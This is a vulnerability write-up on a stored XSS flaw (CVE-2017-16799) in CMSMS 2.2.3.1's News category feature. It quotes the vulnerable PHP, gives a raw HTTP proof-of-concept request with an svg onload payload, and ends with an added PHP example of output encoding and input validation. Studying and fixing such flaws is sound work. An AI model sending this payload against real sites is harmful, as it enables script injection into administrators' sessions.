Use CVE-2017-16799

CMSMS 2.2.3.1 Multiple Vulnerabilities

One day I felt like reviewing the source code of some random CMS and I picked CMSMS. This is totally random and I did this to kill boredom.

Stored XSS

In the Settings section of the News module, you can add a category. The category name is not filtered for XSS, so a stored XSS results. File modules/News/action.addcategory.php, lines 10~29:
````php
// modules/News/action.addcategory.php, lines 10~29 (excerpt; $params and
// $parent are set earlier in the file, outside the quoted range)
$name = trim($params['name']);
//if( $parent == 0 ) $parent = -1;
$name = trim($params['name']);
if ($name != '') {
    // Only a duplicate-name check is done; nothing validates or encodes $name
    $query = 'SELECT news_category_id FROM '.CMS_DB_PREFIX.'module_news_categories WHERE parent_id = ? AND news_category_name = ?';
    $tmp = $db->GetOne($query,array($parent,$name));
    if( $tmp ) {
        echo $this->ShowErrors($this->Lang('error_duplicatename'));
    }
    else {
        $query = 'SELECT max(item_order) FROM '.CMS_DB_PREFIX.'module_news_categories WHERE parent_id = ?';
        $item_order = (int)$db->GetOne($query,array($parent));
        $item_order++;
        $catid = $db->GenID(CMS_DB_PREFIX."module_news_categories_seq");
        // Bound parameters prevent SQL injection, but the raw $name is stored as-is
        $query = 'INSERT INTO '.CMS_DB_PREFIX.'module_news_categories (news_category_id, news_category_name, parent_id, item_order, create_date, modified_date) VALUES (?,?,?,?,NOW(),NOW())';
        $parms = array($catid,$name,$parent,$item_order);
        $db->Execute($query, $parms);
    }
}
````

The `name` parameter is inserted into the database without any filtering.

POC

````http
POST /admin/moduleinterface.php HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:56.0) Gecko/20100101 Firefox/56.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Content-Type: application/x-www-form-urlencoded
Content-Length: 143
Referer: http://127.0.0.1/
Cookie: CMSICb6b86d162b=t5qthj5ve9r557omvs3j9slkm4; CMSSESSID4df2b2a65ee6=5osblhhflr07cfmp1730ffn3n0; _sk_=98cf4d97037a4df557b; bef694b94d14a6e115ebafd2d6cd1380=LGb1BagmBwZ6VaIcMPV7nGbkB3Z6BQbvqKAypz5uoJHvB3Z6AGbvLJEgnJ4vB3Z6AGbvL2gmqJ0vB3Z6AQN6Vwp1MzLkZJD3BQAyZzD4MQt3AGIyATH4MzL1BJRlLwMzZJWyLGVjMQHvB3Z6AmbvMJMzK3IcMPV7GwgmBwRlBvWyMzMsqKAypz5uoJHvB047sD%3D%3D
Connection: close
Upgrade-Insecure-Requests: 1

mact=News%2Cm1_%2Caddcategory%2C0&_sk_=98cf4d97037a4df557b&m1_name=%3Csvg%2F+onload%3Dalert%281%29%3E&m1_parent=-1&m1_submit=%E6%8F%90%E4%BA%A4
````
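As an added example that is not part of the original advisory or of CMSMS's own code, the PHP below runs the PoC's decoded payload through the trim-only handling shown above and then through an input rule and output encoding, to show which of the two actually neutralises the stored value; the function names and the in-memory array standing in for the database are assumptions.

```php
<?php
// Added example (not CMSMS code): contrast the unfiltered insert with
// output encoding at render time and a stricter name check at input.
// The "database" is an in-memory array so this runs stand-alone.
declare(strict_types=1);

/** Mirrors action.addcategory.php: trim() is the only processing. */
function storeCategoryUnfiltered(array &$db, string $name): void
{
    $db[] = trim($name);
}

/** Hardened input rule (assumption, not CMSMS's own): reject names that are
 *  empty, over-long, or contain characters a category name never needs. */
function validateCategoryName(string $name): ?string
{
    $name = trim($name);
    if ($name === '' || strlen($name) > 255) {
        return null;
    }
    if (preg_match('/[<>"\'&]/', $name) === 1) {
        return null;
    }
    return $name;
}

/** Output encoding: this is what prevents the stored XSS, because it
 *  neutralises whatever reached the database, however it got there. */
function renderCategory(string $name): string
{
    return '<li>' . htmlspecialchars($name, ENT_QUOTES | ENT_HTML5, 'UTF-8') . '</li>';
}

// Constructed sample input: the m1_name value from the PoC request, URL-decoded.
$payload = '<svg/ onload=alert(1)>';

$db = [];
storeCategoryUnfiltered($db, $payload);
// Unencoded rendering reproduces the bug: the markup is live in the admin page.
echo "unsafe: <li>{$db[0]}</li>\n";
// Encoded rendering shows the same stored value as inert text.
echo 'safe:   ' . renderCategory($db[0]) . "\n";

// Input validation on its own rejects this payload (NULL) but still accepts
// ordinary names, including non-ASCII ones, so both layers belong together.
var_dump(validateCategoryName($payload));
var_dump(validateCategoryName('  Nachrichten  '));
```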